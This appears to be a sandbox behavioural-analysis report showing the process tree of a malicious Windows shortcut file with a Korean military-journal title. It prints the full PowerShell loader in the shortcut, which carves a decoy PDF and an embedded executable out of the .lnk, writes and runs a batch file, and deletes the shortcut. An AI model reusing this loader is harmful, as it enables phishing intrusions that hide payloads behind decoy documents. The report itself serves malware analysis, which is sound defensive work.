
Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iYxNOhPj" C:\Users\test22\AppData\Local\Temp\한국군사학논총.lnk

    2544
    • cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"&& exit

      2656
      • cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od

        2760
      • powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"

        2812
